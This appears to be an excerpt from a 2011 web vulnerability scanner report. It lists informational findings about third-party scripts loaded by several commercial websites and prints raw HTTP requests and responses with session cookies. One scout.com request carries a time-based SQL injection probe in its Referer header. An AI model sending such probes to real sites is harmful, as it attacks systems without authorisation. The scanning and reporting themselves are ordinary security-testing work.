Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=11598f11-187a-435f-b543-d78ee2a48a53; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.54. http://www.hunton.com/services/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /services/uniGC.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services/uniGC.aspx?xpST=ServiceList HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:26:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=e6106238-84c2-4133-bcd7-11d59e2420c7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.55. http://www.hunton.com/sitemap/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /sitemap/uniGC.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sitemap/uniGC.aspx?xpST=SiteMap HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:30:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1856; path=/
Set-Cookie: PortletId=5993402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d82639e150a34ae"></script>
...[SNIP]...
25.56. http://www.lbmctech.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmctech.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.lbmctech.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:27:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=m3d5l1bt5bgmkn52n0ima4sef3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       <ba
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
       
<!-- Google Analytics -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
25.57. http://www.lbmctech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmctech.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: www.lbmctech.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=39kimhkf897e0jt6oki96fj052; __utmz=194267888.1304749115.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=194267888.851328285.1304749115.1304749115.1304749115.1; __utmc=194267888; __utmb=194267888.1.10.1304749115

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:30:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12392

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" class="small">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
       
<!-- Google Analytics -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
25.58. http://www.millerwelds.com/financing/images/powerline_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /financing/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29451
Date: Fri, 06 May 2011 19:11:35 GMT
X-Varnish: 1128232738 1128232702
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</div>
   

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.59. http://www.millerwelds.com/financing/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /financing/index.php HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:11:26 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 15555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</div>
   

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
25.60. http://www.neospire.net/security-and-compliance/PCI-DSS.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neospire.net
Path:   /security-and-compliance/PCI-DSS.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /security-and-compliance/PCI-DSS.php?utm_source=Google&utm_medium=ppc&utm_campaign=pci-magic&utm_keyword=%252BPCI%2520%252Bcompliance&gclid=CIbrp9zV1KgCFd8D5QodQ0sogw HTTP/1.1
Host: www.neospire.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:22:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=6083a42a7356a1bdbe27f3e50b8622e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 81911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
25.61. http://www.nextadvisor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:40:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=49e74ffb182de820630991c604ed5148; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
25.62. http://www.scmagazineus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%255D%7C1461848369310%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271303995569312%2527%255D%255D%7C1461848369312%3B; __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=drirbgesaxmk42ceg5dgbpib; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
From: Web2-VM
Date: Fri, 06 May 2011 21:49:54 GMT
Content-Length: 78884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:o
...[SNIP]...
<link href="/js/fancybox/jquery.fancybox-1.3.4.css?4126252641" media="screen" rel="Stylesheet" type="text/css" /><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4968340.js"></script>
...[SNIP]...
<div id="marchexLinks">
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=918&amp;ct=SCMAGAZINE_ROS&amp;num=4&amp;layt=624x300&amp;fmt=simp"></script>
...[SNIP]...
<div class="assetContainer"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="assetContainer"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://scmagazineus.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200"></script>
...[SNIP]...
<div class="whitepapersModule"><script type="text/javascript" src="http://dinclinx.com/?s=103&e=0&t=21&f=javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
25.63. http://www.scmagazineus.com/subscribe/section/122/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /subscribe/section/122/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /subscribe/section/122/ HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1; ASP.NET_SessionId=zpaunnv34zkpdxy4mysuxdoz; s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%252C%255B%2527direct%252520load%2527%252C%25271304736598461%2527%255D%255D%7C1462589398461%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271304736598462%2527%255D%255D%7C1462589398462%3B; s_sess=%20s_cc%3Dtrue%3B%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dhaymarketscmagazineus%253D%252526pid%25253Dsc%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.scmagazineus.com/Subscribe/section/122/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: Web2-VM
Date: Fri, 06 May 2011 21:50:05 GMT
Content-Length: 50713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:o
...[SNIP]...
<link href="/js/fancybox/jquery.fancybox-1.3.4.css?4126252641" media="screen" rel="Stylesheet" type="text/css" /><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="marchexLinks">
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=918&amp;ct=SCMAGAZINE_ROS&amp;num=4&amp;layt=624x300&amp;fmt=simp"></script>
...[SNIP]...
<div class="assetContainer"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="assetContainer"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://scmagazineus.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=recent&excerpt_length=200"></script>
...[SNIP]...
<div class="whitepapersModule"><script type="text/javascript" src="http://dinclinx.com/?s=103&e=0&t=21&f=javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
25.64. http://www.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:30:31 GMT
Content-Type: text/html
Expires: Fri, 06 May 2011 19:40:31 GMT
Last-Modified: Fri, 06 May 2011 17:41:15 GMT
Accept-Ranges: bytes
ETag: "1CC0C14CC196F80"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 98822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
<script type="text/javascript" src="http://images.video.msn.com/js/ch/channels.js"></script>
...[SNIP]...
<!-- BEGIN WEBSITEGEAR.COM COMPACT POLL CODE -->
<script type="text/javascript" src="http://poll.websitegear.com/compactpoll.asp?pollID=18420"></script>
...[SNIP]...
25.65. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/Netsparker14ebae4518d541eba819cda8fa442840.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2/Netsparker14ebae4518d541eba819cda8fa442840.z HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 19:56:50 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
